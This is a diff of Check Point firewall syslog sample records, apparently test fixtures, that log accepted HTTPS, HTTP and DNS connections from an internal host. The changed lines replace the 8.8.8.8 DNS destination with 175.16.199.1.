 <134>1 2020-03-29T16:57:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d374,0x5,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"99.86.116.100"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50306"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:57:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d375,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"195.88.54.22"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"38150"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:57:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d375,0x1,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"195.88.55.21"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"58796"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:57:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d375,0x2,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"23.100.50.51"; log_delay:"1585501045"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"36480"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d375,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501045"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"48805"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d375,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501045"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45891"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d375,0x1,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501045"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40732"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d375,0x3,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501045"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46101"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d375,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501045"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"48805"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d375,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501045"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45891"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d375,0x1,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501045"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40732"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d375,0x3,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501045"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46101"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:57:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d375,0x1,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"216.58.208.98"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"40060"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:57:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d375,0x4,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"216.58.208.98"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"40062"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:57:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d375,0x2,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"11"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"52.166.113.188"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"37676"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:57:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d375,0x2,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"12"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"195.88.54.95"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"38236"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d375,0x3,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"13"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501045"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51168"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d375,0x4,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"14"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501045"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34519"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d375,0x3,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"13"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501045"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51168"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d375,0x4,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"14"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501045"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34519"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:57:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d375,0x5,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"15"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"104.81.140.175"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"38896"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d375,0x3,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"16"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501045"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57686"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d375,0x3,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"16"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501045"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57686"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:57:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d375,0x5,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"17"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"151.101.37.108"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"37566"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:57:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d375,0x4,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"18"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"188.40.136.143"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"43990"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:57:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d375,0x6,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"19"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"188.40.136.143"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"43988"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d375,0x5,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"20"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501045"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55031"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d375,0x5,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"20"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501045"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55031"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:57:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d375,0x6,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"21"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"88.221.25.147"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"34906"; service:"80"; service_id:"http"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:57:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d375,0x7,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"22"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"88.221.25.147"; log_delay:"1585501045"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"34908"; service:"80"; service_id:"http"; src:"192.168.2.2"]
